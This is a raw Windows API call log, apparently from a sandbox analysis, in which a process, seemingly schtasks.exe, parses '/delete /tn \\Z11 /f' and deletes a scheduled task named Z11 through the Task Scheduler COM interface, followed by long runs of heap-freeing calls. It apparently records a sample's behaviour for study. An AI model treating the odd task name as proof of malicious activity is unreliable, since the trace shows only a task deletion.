[0380.445] SetLastError (dwErrCode=0x490)
[0380.445] lstrlenW (lpString="tn") returned 2
[0380.445] lstrlenW (lpString="tn") returned 2
[0380.446] _memicmp (_Buf1=0x9c150, _Buf2=0xffa51b08, _Size=0x7) returned 0
[0380.446] lstrlenW (lpString="TN") returned 2
[0380.446] _memicmp (_Buf1=0x9c290, _Buf2=0xffa51b08, _Size=0x7) returned 0
[0380.446] _vsnwprintf (in: _Buffer=0x9c2d0, _BufferCount=0x5, _Format="|%s|", _ArgList=0x24efc8 | out: _Buffer="|tn|") returned 4
[0380.446] _vsnwprintf (in: _Buffer=0x9c2b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0x24efc8 | out: _Buffer="|TN|") returned 4
[0380.446] lstrlenW (lpString="|tn|") returned 4
[0380.446] lstrlenW (lpString="|TN|") returned 4
[0380.446] StrStrIW (lpFirst="|tn|", lpSrch="|TN|") returned="|tn|"
[0380.446] SetLastError (dwErrCode=0x0)
[0380.446] SetLastError (dwErrCode=0x0)
[0380.446] lstrlenW (lpString="\\Z11") returned 4
[0380.446] lstrlenW (lpString="-/") returned 2
[0380.446] StrChrIW (lpStart="-/", wMatch=0x5c) returned 0x0
[0380.446] SetLastError (dwErrCode=0x490)
[0380.447] SetLastError (dwErrCode=0x490)
[0380.447] SetLastError (dwErrCode=0x0)
[0380.447] lstrlenW (lpString="\\Z11") returned 4
[0380.447] StrChrIW (lpStart="\\Z11", wMatch=0x3a) returned 0x0
[0380.447] SetLastError (dwErrCode=0x490)
[0380.447] SetLastError (dwErrCode=0x0)
[0380.447] lstrlenW (lpString="\\Z11") returned 4
[0380.447] SetLastError (dwErrCode=0x0)
[0380.447] SetLastError (dwErrCode=0x0)
[0380.447] lstrlenW (lpString="/f") returned 2
[0380.447] lstrlenW (lpString="-/") returned 2
[0380.447] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/"
[0380.447] lstrlenW (lpString="delete") returned 6
[0380.447] lstrlenW (lpString="delete") returned 6
[0380.447] _memicmp (_Buf1=0x9c150, _Buf2=0xffa51b08, _Size=0x7) returned 0
[0380.448] lstrlenW (lpString="f") returned 1
[0380.448] _memicmp (_Buf1=0x9c290, _Buf2=0xffa51b08, _Size=0x7) returned 0
[0380.448] _vsnwprintf (in: _Buffer=0x9c2d0, _BufferCount=0x9, _Format="|%s|", _ArgList=0x24efc8 | out: _Buffer="|delete|") returned 8
[0380.448] _vsnwprintf (in: _Buffer=0x9c2b0, _BufferCount=0x4, _Format="|%s|", _ArgList=0x24efc8 | out: _Buffer="|f|") returned 3
[0380.448] lstrlenW (lpString="|delete|") returned 8
[0380.448] lstrlenW (lpString="|f|") returned 3
[0380.448] StrStrIW (lpFirst="|delete|", lpSrch="|f|") returned 0x0
[0380.448] SetLastError (dwErrCode=0x490)
[0380.448] lstrlenW (lpString="?") returned 1
[0380.448] lstrlenW (lpString="?") returned 1
[0380.448] _memicmp (_Buf1=0x9c150, _Buf2=0xffa51b08, _Size=0x7) returned 0
[0380.449] lstrlenW (lpString="f") returned 1
[0380.449] _memicmp (_Buf1=0x9c290, _Buf2=0xffa51b08, _Size=0x7) returned 0
[0380.449] _vsnwprintf (in: _Buffer=0x9c2d0, _BufferCount=0x4, _Format="|%s|", _ArgList=0x24efc8 | out: _Buffer="|?|") returned 3
[0380.449] _vsnwprintf (in: _Buffer=0x9c2b0, _BufferCount=0x4, _Format="|%s|", _ArgList=0x24efc8 | out: _Buffer="|f|") returned 3
[0380.449] lstrlenW (lpString="|?|") returned 3
[0380.450] lstrlenW (lpString="|f|") returned 3
[0380.450] StrStrIW (lpFirst="|?|", lpSrch="|f|") returned 0x0
[0380.450] SetLastError (dwErrCode=0x490)
[0380.450] lstrlenW (lpString="s") returned 1
[0380.450] lstrlenW (lpString="s") returned 1
[0380.450] _memicmp (_Buf1=0x9c150, _Buf2=0xffa51b08, _Size=0x7) returned 0
[0380.450] lstrlenW (lpString="f") returned 1
[0380.450] _memicmp (_Buf1=0x9c290, _Buf2=0xffa51b08, _Size=0x7) returned 0
[0380.450] _vsnwprintf (in: _Buffer=0x9c2d0, _BufferCount=0x4, _Format="|%s|", _ArgList=0x24efc8 | out: _Buffer="|s|") returned 3
[0380.450] _vsnwprintf (in: _Buffer=0x9c2b0, _BufferCount=0x4, _Format="|%s|", _ArgList=0x24efc8 | out: _Buffer="|f|") returned 3
[0380.450] lstrlenW (lpString="|s|") returned 3
[0380.450] lstrlenW (lpString="|f|") returned 3
[0380.451] StrStrIW (lpFirst="|s|", lpSrch="|f|") returned 0x0
[0380.451] SetLastError (dwErrCode=0x490)
[0380.451] lstrlenW (lpString="u") returned 1
[0380.451] lstrlenW (lpString="u") returned 1
[0380.451] _memicmp (_Buf1=0x9c150, _Buf2=0xffa51b08, _Size=0x7) returned 0
[0380.451] lstrlenW (lpString="f") returned 1
[0380.451] _memicmp (_Buf1=0x9c290, _Buf2=0xffa51b08, _Size=0x7) returned 0
[0380.451] _vsnwprintf (in: _Buffer=0x9c2d0, _BufferCount=0x4, _Format="|%s|", _ArgList=0x24efc8 | out: _Buffer="|u|") returned 3
[0380.451] _vsnwprintf (in: _Buffer=0x9c2b0, _BufferCount=0x4, _Format="|%s|", _ArgList=0x24efc8 | out: _Buffer="|f|") returned 3
[0380.451] lstrlenW (lpString="|u|") returned 3
[0380.451] lstrlenW (lpString="|f|") returned 3
[0380.451] StrStrIW (lpFirst="|u|", lpSrch="|f|") returned 0x0
[0380.452] SetLastError (dwErrCode=0x490)
[0380.452] lstrlenW (lpString="p") returned 1
[0380.452] lstrlenW (lpString="p") returned 1
[0380.452] _memicmp (_Buf1=0x9c150, _Buf2=0xffa51b08, _Size=0x7) returned 0
[0380.452] lstrlenW (lpString="f") returned 1
[0380.452] _memicmp (_Buf1=0x9c290, _Buf2=0xffa51b08, _Size=0x7) returned 0
[0380.452] _vsnwprintf (in: _Buffer=0x9c2d0, _BufferCount=0x4, _Format="|%s|", _ArgList=0x24efc8 | out: _Buffer="|p|") returned 3
[0380.452] _vsnwprintf (in: _Buffer=0x9c2b0, _BufferCount=0x4, _Format="|%s|", _ArgList=0x24efc8 | out: _Buffer="|f|") returned 3
[0380.452] lstrlenW (lpString="|p|") returned 3
[0380.452] lstrlenW (lpString="|f|") returned 3
[0380.452] StrStrIW (lpFirst="|p|", lpSrch="|f|") returned 0x0
[0380.452] SetLastError (dwErrCode=0x490)
[0380.453] lstrlenW (lpString="tn") returned 2
[0380.453] lstrlenW (lpString="tn") returned 2
[0380.453] _memicmp (_Buf1=0x9c150, _Buf2=0xffa51b08, _Size=0x7) returned 0
[0380.453] lstrlenW (lpString="f") returned 1
[0380.453] _memicmp (_Buf1=0x9c290, _Buf2=0xffa51b08, _Size=0x7) returned 0
[0380.453] _vsnwprintf (in: _Buffer=0x9c2d0, _BufferCount=0x5, _Format="|%s|", _ArgList=0x24efc8 | out: _Buffer="|tn|") returned 4
[0380.453] _vsnwprintf (in: _Buffer=0x9c2b0, _BufferCount=0x4, _Format="|%s|", _ArgList=0x24efc8 | out: _Buffer="|f|") returned 3
[0380.453] lstrlenW (lpString="|tn|") returned 4
[0380.453] lstrlenW (lpString="|f|") returned 3
[0380.453] StrStrIW (lpFirst="|tn|", lpSrch="|f|") returned 0x0
[0380.453] SetLastError (dwErrCode=0x490)
[0380.454] lstrlenW (lpString="f") returned 1
[0380.454] lstrlenW (lpString="f") returned 1
[0380.454] _memicmp (_Buf1=0x9c150, _Buf2=0xffa51b08, _Size=0x7) returned 0
[0380.454] lstrlenW (lpString="f") returned 1
[0380.454] _memicmp (_Buf1=0x9c290, _Buf2=0xffa51b08, _Size=0x7) returned 0
[0380.454] _vsnwprintf (in: _Buffer=0x9c2d0, _BufferCount=0x4, _Format="|%s|", _ArgList=0x24efc8 | out: _Buffer="|f|") returned 3
[0380.454] _vsnwprintf (in: _Buffer=0x9c2b0, _BufferCount=0x4, _Format="|%s|", _ArgList=0x24efc8 | out: _Buffer="|f|") returned 3
[0380.454] lstrlenW (lpString="|f|") returned 3
[0380.454] lstrlenW (lpString="|f|") returned 3
[0380.454] StrStrIW (lpFirst="|f|", lpSrch="|f|") returned="|f|"
[0380.454] SetLastError (dwErrCode=0x0)
[0380.454] SetLastError (dwErrCode=0x0)
[0380.454] lstrlenW (lpString="\\Z11") returned 4
[0380.455] SetLastError (dwErrCode=0x0)
[0380.455] LoadLibraryExA (lpLibFileName="API-MS-WIN-Service-Management-L1-1-0.dll", hFile=0x0, dwFlags=0x0) returned 0x7fefdef0000
[0380.459] GetProcAddress (hModule=0x7fefdef0000, lpProcName="OpenSCManagerW") returned 0x7fefdef659c
[0380.459] OpenSCManagerW (lpMachineName="", lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x9d030
[0380.470] GetProcAddress (hModule=0x7fefdef0000, lpProcName="OpenServiceW") returned 0x7fefdef6484
[0380.470] OpenServiceW (hSCManager=0x9d030, lpServiceName="Schedule", dwDesiredAccess=0x14) returned 0x0
[0380.472] GetProcAddress (hModule=0x7fefdef0000, lpProcName="CloseServiceHandle") returned 0x7fefdef6518
[0380.472] CloseServiceHandle (hSCObject=0x9d030) returned 1
[0380.476] CoInitializeEx (pvReserved=0x0, dwCoInit=0x2) returned 0x0
[0380.509] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x1, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0
[0380.529] CoCreateInstance (in: rclsid=0xffa51ae0*(Data1=0xf87369f, Data2=0xa4e5, Data3=0x4cfc, Data4=([0]=0xbd, [1]=0x3e, [2]=0x73, [3]=0xe6, [4]=0x15, [5]=0x45, [6]=0x72, [7]=0xdd)), pUnkOuter=0x0, dwClsContext=0x17, riid=0xffa51ad0*(Data1=0x2faba4c7, Data2=0x4da9, Data3=0x4013, Data4=([0]=0x96, [1]=0x97, [2]=0x20, [3]=0xcc, [4]=0x3f, [5]=0xd4, [6]=0xf, [7]=0x85)), ppv=0x24e940 | out: ppv=0x24e940*=0x2cdef0) returned 0x0
[0380.553] TaskScheduler:ITaskService:Connect (This=0x2cdef0, serverName=0x24ea20*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), user=0x24e9e0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), domain=0x24ea00*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), password=0x24e9c0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0)) returned 0x0
[0380.566] TaskScheduler:IUnknown:AddRef (This=0x2cdef0) returned 0x2
[0380.566] TaskScheduler:ITaskService:GetFolder (in: This=0x2cdef0, Path=0x0, ppFolder=0x24ea90 | out: ppFolder=0x24ea90*=0x3c7b30) returned 0x0
[0380.574] GetProcessHeap () returned 0x80000
[0380.574] RtlAllocateHeap (HeapHandle=0x80000, Flags=0xc, Size=0x18) returned 0xa1220
[0380.574] GetThreadLocale () returned 0x409
[0380.574] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="\\Z11", cchCount1=-1, lpString2="*", cchCount2=-1) returned 3
[0380.574] ITaskFolder:GetTask (in: This=0x3c7b30, Path="\\Z11", ppTask=0x24e9c0 | out: ppTask=0x24e9c0*=0x3c7b80) returned 0x0
[0380.598] lstrlenW (lpString="\\Z11") returned 4
[0380.598] GetProcessHeap () returned 0x80000
[0380.598] RtlAllocateHeap (HeapHandle=0x80000, Flags=0xc, Size=0xa) returned 0xa12c0
[0380.598] GetProcessHeap () returned 0x80000
[0380.598] RtlAllocateHeap (HeapHandle=0x80000, Flags=0xc, Size=0x20) returned 0xb3870
[0380.598] IUnknown:Release (This=0x3c7b80) returned 0x0
[0380.599] ITaskFolder:DeleteTask (This=0x3c7b30, Name="", flags=0) returned 0x0
[0380.730] GetProcessHeap () returned 0x80000
[0380.730] RtlAllocateHeap (HeapHandle=0x80000, Flags=0xc, Size=0x20) returned 0xb38a0
[0380.730] _memicmp (_Buf1=0x9bb40, _Buf2=0xffa51b08, _Size=0x7) returned 0
[0380.730] LoadStringW (in: hInstance=0x0, uID=0x12d, lpBuffer=0x9d350, cchBufferMax=256 | out: lpBuffer="SUCCESS: The scheduled task \"%s\" was successfully deleted.\n") returned 0x3b
[0380.730] lstrlenW (lpString="SUCCESS: The scheduled task \"%s\" was successfully deleted.\n") returned 59
[0380.730] GetProcessHeap () returned 0x80000
[0380.730] RtlAllocateHeap (HeapHandle=0x80000, Flags=0xc, Size=0x78) returned 0xb7d50
[0380.730] _vsnwprintf (in: _Buffer=0x24eac0, _BufferCount=0x1fb, _Format="SUCCESS: The scheduled task \"%s\" was successfully deleted.\n", _ArgList=0x24ea88 | out: _Buffer="SUCCESS: The scheduled task \"\\Z11\" was successfully deleted.\n") returned 61
[0380.730] _fileno (_File=0x7feff862ab0) returned 1
[0380.731] _errno () returned 0x3c4bb0
[0380.731] _get_osfhandle (_FileHandle=1) returned 0x7
[0380.731] _errno () returned 0x3c4bb0
[0380.731] GetFileType (hFile=0x7) returned 0x2
[0380.731] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0380.731] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x24ea00 | out: lpMode=0x24ea00) returned 1
[0380.732] __iob_func () returned 0x7feff862a80
[0380.732] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0380.732] lstrlenW (lpString="SUCCESS: The scheduled task \"\\Z11\" was successfully deleted.\n") returned 61
[0380.732] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x24eac0*, nNumberOfCharsToWrite=0x3d, lpNumberOfCharsWritten=0x24ea70, lpReserved=0x0 | out: lpBuffer=0x24eac0*, lpNumberOfCharsWritten=0x24ea70*=0x3d) returned 1
[0380.733] TaskScheduler:IUnknown:Release (This=0x3c7b30) returned 0x0
[0380.733] TaskScheduler:IUnknown:Release (This=0x2cdef0) returned 0x1
[0380.733] GetProcessHeap () returned 0x80000
[0380.733] GetProcessHeap () returned 0x80000
[0380.733] HeapValidate (hHeap=0x80000, dwFlags=0x0, lpMem=0x9c270) returned 1
[0380.733] GetProcessHeap () returned 0x80000
[0380.733] RtlSizeHeap (HeapHandle=0x80000, Flags=0x0, MemoryPointer=0x9c270) returned 0x16
[0380.734] HeapFree (in: hHeap=0x80000, dwFlags=0x0, lpMem=0x9c270 | out: hHeap=0x80000) returned 1
[0380.734] GetProcessHeap () returned 0x80000
[0380.734] GetProcessHeap () returned 0x80000
[0380.734] HeapValidate (hHeap=0x80000, dwFlags=0x0, lpMem=0x9ba40) returned 1
[0380.734] GetProcessHeap () returned 0x80000
[0380.734] RtlSizeHeap (HeapHandle=0x80000, Flags=0x0, MemoryPointer=0x9ba40) returned 0x18
[0380.734] HeapFree (in: hHeap=0x80000, dwFlags=0x0, lpMem=0x9ba40 | out: hHeap=0x80000) returned 1
[0380.734] GetProcessHeap () returned 0x80000
[0380.734] GetProcessHeap () returned 0x80000
[0380.734] HeapValidate (hHeap=0x80000, dwFlags=0x0, lpMem=0x9cd30) returned 1
[0380.734] GetProcessHeap () returned 0x80000
[0380.734] RtlSizeHeap (HeapHandle=0x80000, Flags=0x0, MemoryPointer=0x9cd30) returned 0x20
[0380.735] HeapFree (in: hHeap=0x80000, dwFlags=0x0, lpMem=0x9cd30 | out: hHeap=0x80000) returned 1
[0380.735] GetProcessHeap () returned 0x80000
[0380.735] GetProcessHeap () returned 0x80000
[0380.735] HeapValidate (hHeap=0x80000, dwFlags=0x0, lpMem=0x9c0a0) returned 1
[0380.735] GetProcessHeap () returned 0x80000
[0380.735] RtlSizeHeap (HeapHandle=0x80000, Flags=0x0, MemoryPointer=0x9c0a0) returned 0xa0
[0380.735] HeapFree (in: hHeap=0x80000, dwFlags=0x0, lpMem=0x9c0a0 | out: hHeap=0x80000) returned 1
[0380.736] GetProcessHeap () returned 0x80000
[0380.736] GetProcessHeap () returned 0x80000
[0380.736] HeapValidate (hHeap=0x80000, dwFlags=0x0, lpMem=0x9bb20) returned 1
[0380.736] GetProcessHeap () returned 0x80000
[0380.736] RtlSizeHeap (HeapHandle=0x80000, Flags=0x0, MemoryPointer=0x9bb20) returned 0x18
[0380.736] HeapFree (in: hHeap=0x80000, dwFlags=0x0, lpMem=0x9bb20 | out: hHeap=0x80000) returned 1
[0380.736] GetProcessHeap () returned 0x80000
[0380.736] GetProcessHeap () returned 0x80000
[0380.736] HeapValidate (hHeap=0x80000, dwFlags=0x0, lpMem=0x9cc10) returned 1
[0380.736] GetProcessHeap () returned 0x80000
[0380.736] RtlSizeHeap (HeapHandle=0x80000, Flags=0x0, MemoryPointer=0x9cc10) returned 0x20
[0380.737] HeapFree (in: hHeap=0x80000, dwFlags=0x0, lpMem=0x9cc10 | out: hHeap=0x80000) returned 1
[0380.737] GetProcessHeap () returned 0x80000
[0380.737] GetProcessHeap () returned 0x80000
[0380.737] HeapValidate (hHeap=0x80000, dwFlags=0x0, lpMem=0x9bca0) returned 1
[0380.737] GetProcessHeap () returned 0x80000
[0380.737] RtlSizeHeap (HeapHandle=0x80000, Flags=0x0, MemoryPointer=0x9bca0) returned 0x208
[0380.737] HeapFree (in: hHeap=0x80000, dwFlags=0x0, lpMem=0x9bca0 | out: hHeap=0x80000) returned 1
[0380.737] GetProcessHeap () returned 0x80000
[0380.737] GetProcessHeap () returned 0x80000
[0380.737] HeapValidate (hHeap=0x80000, dwFlags=0x0, lpMem=0x9bb00) returned 1
[0380.737] GetProcessHeap () returned 0x80000
[0380.737] RtlSizeHeap (HeapHandle=0x80000, Flags=0x0, MemoryPointer=0x9bb00) returned 0x18
[0380.738] HeapFree (in: hHeap=0x80000, dwFlags=0x0, lpMem=0x9bb00 | out: hHeap=0x80000) returned 1
[0380.738] GetProcessHeap () returned 0x80000
[0380.738] GetProcessHeap () returned 0x80000
[0380.738] HeapValidate (hHeap=0x80000, dwFlags=0x0, lpMem=0x95d20) returned 1
[0380.738] GetProcessHeap () returned 0x80000
[0380.738] RtlSizeHeap (HeapHandle=0x80000, Flags=0x0, MemoryPointer=0x95d20) returned 0x20
[0380.738] HeapFree (in: hHeap=0x80000, dwFlags=0x0, lpMem=0x95d20 | out: hHeap=0x80000) returned 1
[0380.738] GetProcessHeap () returned 0x80000
[0380.738] GetProcessHeap () returned 0x80000
[0380.738] HeapValidate (hHeap=0x80000, dwFlags=0x0, lpMem=0x9d350) returned 1
[0380.738] GetProcessHeap () returned 0x80000
[0380.739] RtlSizeHeap (HeapHandle=0x80000, Flags=0x0, MemoryPointer=0x9d350) returned 0x200
[0380.739] HeapFree (in: hHeap=0x80000, dwFlags=0x0, lpMem=0x9d350 | out: hHeap=0x80000) returned 1
[0380.739] GetProcessHeap () returned 0x80000
[0380.739] GetProcessHeap () returned 0x80000
[0380.739] HeapValidate (hHeap=0x80000, dwFlags=0x0, lpMem=0x9bb40) returned 1
[0380.739] GetProcessHeap () returned 0x80000
[0380.739] RtlSizeHeap (HeapHandle=0x80000, Flags=0x0, MemoryPointer=0x9bb40) returned 0x18
[0380.739] HeapFree (in: hHeap=0x80000, dwFlags=0x0, lpMem=0x9bb40 | out: hHeap=0x80000) returned 1
[0380.739] GetProcessHeap () returned 0x80000
[0380.739] GetProcessHeap () returned 0x80000
[0380.740] HeapValidate (hHeap=0x80000, dwFlags=0x0, lpMem=0x95c90) returned 1
[0380.740] GetProcessHeap () returned 0x80000
[0380.740] RtlSizeHeap (HeapHandle=0x80000, Flags=0x0, MemoryPointer=0x95c90) returned 0x20
[0380.740] HeapFree (in: hHeap=0x80000, dwFlags=0x0, lpMem=0x95c90 | out: hHeap=0x80000) returned 1
[0380.740] GetProcessHeap () returned 0x80000
[0380.740] GetProcessHeap () returned 0x80000
[0380.740] HeapValidate (hHeap=0x80000, dwFlags=0x0, lpMem=0x9c2b0) returned 1
[0380.740] GetProcessHeap () returned 0x80000
[0380.740] RtlSizeHeap (HeapHandle=0x80000, Flags=0x0, MemoryPointer=0x9c2b0) returned 0x14
[0380.740] HeapFree (in: hHeap=0x80000, dwFlags=0x0, lpMem=0x9c2b0 | out: hHeap=0x80000) returned 1
[0380.741] GetProcessHeap () returned 0x80000
[0380.741] GetProcessHeap () returned 0x80000
[0380.741] HeapValidate (hHeap=0x80000, dwFlags=0x0, lpMem=0x9c290) returned 1
[0380.741] GetProcessHeap () returned 0x80000
[0380.741] RtlSizeHeap (HeapHandle=0x80000, Flags=0x0, MemoryPointer=0x9c290) returned 0x18
[0380.741] HeapFree (in: hHeap=0x80000, dwFlags=0x0, lpMem=0x9c290 | out: hHeap=0x80000) returned 1
[0380.741] GetProcessHeap () returned 0x80000
[0380.741] GetProcessHeap () returned 0x80000
[0380.741] HeapValidate (hHeap=0x80000, dwFlags=0x0, lpMem=0x95bd0) returned 1
[0380.741] GetProcessHeap () returned 0x80000
[0380.741] RtlSizeHeap (HeapHandle=0x80000, Flags=0x0, MemoryPointer=0x95bd0) returned 0x20
[0380.742] HeapFree (in: hHeap=0x80000, dwFlags=0x0, lpMem=0x95bd0 | out: hHeap=0x80000) returned 1
[0380.742] GetProcessHeap () returned 0x80000
[0380.742] GetProcessHeap () returned 0x80000
[0380.742] HeapValidate (hHeap=0x80000, dwFlags=0x0, lpMem=0x9c2d0) returned 1
[0380.742] GetProcessHeap () returned 0x80000
[0380.742] RtlSizeHeap (HeapHandle=0x80000, Flags=0x0, MemoryPointer=0x9c2d0) returned 0x16
[0380.742] HeapFree (in: hHeap=0x80000, dwFlags=0x0, lpMem=0x9c2d0 | out: hHeap=0x80000) returned 1
[0380.742] GetProcessHeap () returned 0x80000
[0380.742] GetProcessHeap () returned 0x80000
[0380.742] HeapValidate (hHeap=0x80000, dwFlags=0x0, lpMem=0x9c150) returned 1
[0380.742] GetProcessHeap () returned 0x80000
[0380.742] RtlSizeHeap (HeapHandle=0x80000, Flags=0x0, MemoryPointer=0x9c150) returned 0x18
[0380.743] HeapFree (in: hHeap=0x80000, dwFlags=0x0, lpMem=0x9c150 | out: hHeap=0x80000) returned 1
[0380.743] GetProcessHeap () returned 0x80000
[0380.743] GetProcessHeap () returned 0x80000
[0380.743] HeapValidate (hHeap=0x80000, dwFlags=0x0, lpMem=0x95ba0) returned 1
[0380.743] GetProcessHeap () returned 0x80000
[0380.743] RtlSizeHeap (HeapHandle=0x80000, Flags=0x0, MemoryPointer=0x95ba0) returned 0x20
[0380.743] HeapFree (in: hHeap=0x80000, dwFlags=0x0, lpMem=0x95ba0 | out: hHeap=0x80000) returned 1
[0380.743] GetProcessHeap () returned 0x80000
[0380.743] GetProcessHeap () returned 0x80000
[0380.743] HeapValidate (hHeap=0x80000, dwFlags=0x0, lpMem=0x9ba80) returned 1
[0380.743] GetProcessHeap () returned 0x80000
[0380.744] RtlSizeHeap (HeapHandle=0x80000, Flags=0x0, MemoryPointer=0x9ba80) returned 0x2
[0380.744] HeapFree (in: hHeap=0x80000, dwFlags=0x0, lpMem=0x9ba80 | out: hHeap=0x80000) returned 1
[0380.744] GetProcessHeap () returned 0x80000
[0380.744] GetProcessHeap () returned 0x80000
[0380.744] HeapValidate (hHeap=0x80000, dwFlags=0x0, lpMem=0x959f0) returned 1
[0380.744] GetProcessHeap () returned 0x80000
[0380.744] RtlSizeHeap (HeapHandle=0x80000, Flags=0x0, MemoryPointer=0x959f0) returned 0x20
[0380.744] HeapFree (in: hHeap=0x80000, dwFlags=0x0, lpMem=0x959f0 | out: hHeap=0x80000) returned 1
[0380.744] GetProcessHeap () returned 0x80000
[0380.745] GetProcessHeap () returned 0x80000
[0380.745] HeapValidate (hHeap=0x80000, dwFlags=0x0, lpMem=0x95a20) returned 1
[0380.745] GetProcessHeap () returned 0x80000
[0380.745] RtlSizeHeap (HeapHandle=0x80000, Flags=0x0, MemoryPointer=0x95a20) returned 0x20
[0380.745] HeapFree (in: hHeap=0x80000, dwFlags=0x0, lpMem=0x95a20 | out: hHeap=0x80000) returned 1
[0380.745] GetProcessHeap () returned 0x80000
[0380.745] GetProcessHeap () returned 0x80000
[0380.745] HeapValidate (hHeap=0x80000, dwFlags=0x0, lpMem=0x95a50) returned 1
[0380.745] GetProcessHeap () returned 0x80000
[0380.746] RtlSizeHeap (HeapHandle=0x80000, Flags=0x0, MemoryPointer=0x95a50) returned 0x20
[0380.746] HeapFree (in: hHeap=0x80000, dwFlags=0x0, lpMem=0x95a50 | out: hHeap=0x80000) returned 1
[0380.746] GetProcessHeap () returned 0x80000
[0380.746] GetProcessHeap () returned 0x80000
[0380.746] HeapValidate (hHeap=0x80000, dwFlags=0x0, lpMem=0x95a80) returned 1
[0380.746] GetProcessHeap () returned 0x80000
[0380.746] RtlSizeHeap (HeapHandle=0x80000, Flags=0x0, MemoryPointer=0x95a80) returned 0x20
[0380.747] HeapFree (in: hHeap=0x80000, dwFlags=0x0, lpMem=0x95a80 | out: hHeap=0x80000) returned 1
[0380.747] GetProcessHeap () returned 0x80000
[0380.747] GetProcessHeap () returned 0x80000
[0380.747] HeapValidate (hHeap=0x80000, dwFlags=0x0, lpMem=0x9cc40) returned 1
[0380.747] GetProcessHeap () returned 0x80000
[0380.747] RtlSizeHeap (HeapHandle=0x80000, Flags=0x0, MemoryPointer=0x9cc40) returned 0x20
[0380.747] HeapFree (in: hHeap=0x80000, dwFlags=0x0, lpMem=0x9cc40 | out: hHeap=0x80000) returned 1
[0380.747] GetProcessHeap () returned 0x80000
[0380.747] GetProcessHeap () returned 0x80000
[0380.747] HeapValidate (hHeap=0x80000, dwFlags=0x0, lpMem=0x9cc70) returned 1
[0380.747] GetProcessHeap () returned 0x80000
[0380.748] RtlSizeHeap (HeapHandle=0x80000, Flags=0x0, MemoryPointer=0x9cc70) returned 0x20
[0380.748] HeapFree (in: hHeap=0x80000, dwFlags=0x0, lpMem=0x9cc70 | out: hHeap=0x80000) returned 1
[0380.748] GetProcessHeap () returned 0x80000
[0380.748] GetProcessHeap () returned 0x80000
[0380.748] HeapValidate (hHeap=0x80000, dwFlags=0x0, lpMem=0x97c50) returned 1
[0380.748] GetProcessHeap () returned 0x80000
[0380.748] RtlSizeHeap (HeapHandle=0x80000, Flags=0x0, MemoryPointer=0x97c50) returned 0x30
[0380.749] HeapFree (in: hHeap=0x80000, dwFlags=0x0, lpMem=0x97c50 | out: hHeap=0x80000) returned 1
[0380.749] GetProcessHeap () returned 0x80000
[0380.749] GetProcessHeap () returned 0x80000
[0380.749] HeapValidate (hHeap=0x80000, dwFlags=0x0, lpMem=0x9cca0) returned 1
[0380.749] GetProcessHeap () returned 0x80000
[0380.749] RtlSizeHeap (HeapHandle=0x80000, Flags=0x0, MemoryPointer=0x9cca0) returned 0x20
[0380.749] HeapFree (in: hHeap=0x80000, dwFlags=0x0, lpMem=0x9cca0 | out: hHeap=0x80000) returned 1
[0380.749] GetProcessHeap () returned 0x80000
[0380.749] GetProcessHeap () returned 0x80000
[0380.749] HeapValidate (hHeap=0x80000, dwFlags=0x0, lpMem=0x97c90) returned 1
[0380.749] GetProcessHeap () returned 0x80000
[0380.749] RtlSizeHeap (HeapHandle=0x80000, Flags=0x0, MemoryPointer=0x97c90) returned 0x30
[0380.750] HeapFree (in: hHeap=0x80000, dwFlags=0x0, lpMem=0x97c90 | out: hHeap=0x80000) returned 1
[0380.750] GetProcessHeap () returned 0x80000
[0380.750] GetProcessHeap () returned 0x80000
[0380.750] HeapValidate (hHeap=0x80000, dwFlags=0x0, lpMem=0x9cd00) returned 1
[0380.750] GetProcessHeap () returned 0x80000
[0380.750] RtlSizeHeap (HeapHandle=0x80000, Flags=0x0, MemoryPointer=0x9cd00) returned 0x20
[0380.751] HeapFree (in: hHeap=0x80000, dwFlags=0x0, lpMem=0x9cd00 | out: hHeap=0x80000) returned 1
[0380.751] GetProcessHeap () returned 0x80000
[0380.751] GetProcessHeap () returned 0x80000
[0380.751] HeapValidate (hHeap=0x80000, dwFlags=0x0, lpMem=0xb7d50) returned 1
[0380.751] GetProcessHeap () returned 0x80000
[0380.751] RtlSizeHeap (HeapHandle=0x80000, Flags=0x0, MemoryPointer=0xb7d50) returned 0x78
[0380.751] HeapFree (in: hHeap=0x80000, dwFlags=0x0, lpMem=0xb7d50 | out: hHeap=0x80000) returned 1
[0380.751] GetProcessHeap () returned 0x80000
[0380.751] GetProcessHeap () returned 0x80000
[0380.751] HeapValidate (hHeap=0x80000, dwFlags=0x0, lpMem=0xb38a0) returned 1
[0380.752] GetProcessHeap () returned 0x80000
[0380.752] RtlSizeHeap (HeapHandle=0x80000, Flags=0x0, MemoryPointer=0xb38a0) returned 0x20
[0380.752] HeapFree (in: hHeap=0x80000, dwFlags=0x0, lpMem=0xb38a0 | out: hHeap=0x80000) returned 1
[0380.752] GetProcessHeap () returned 0x80000
[0380.752] GetProcessHeap () returned 0x80000
[0380.752] HeapValidate (hHeap=0x80000, dwFlags=0x0, lpMem=0x9baa0) returned 1
[0380.752] GetProcessHeap () returned 0x80000
[0380.752] RtlSizeHeap (HeapHandle=0x80000, Flags=0x0, MemoryPointer=0x9baa0) returned 0x18
[0380.752] HeapFree (in: hHeap=0x80000, dwFlags=0x0, lpMem=0x9baa0 | out: hHeap=0x80000) returned 1
[0380.752] GetProcessHeap () returned 0x80000
[0380.753] GetProcessHeap () returned 0x80000
[0380.753] HeapValidate (hHeap=0x80000, dwFlags=0x0, lpMem=0x95ab0) returned 1
[0380.753] GetProcessHeap () returned 0x80000
[0380.753] RtlSizeHeap (HeapHandle=0x80000, Flags=0x0, MemoryPointer=0x95ab0) returned 0x20
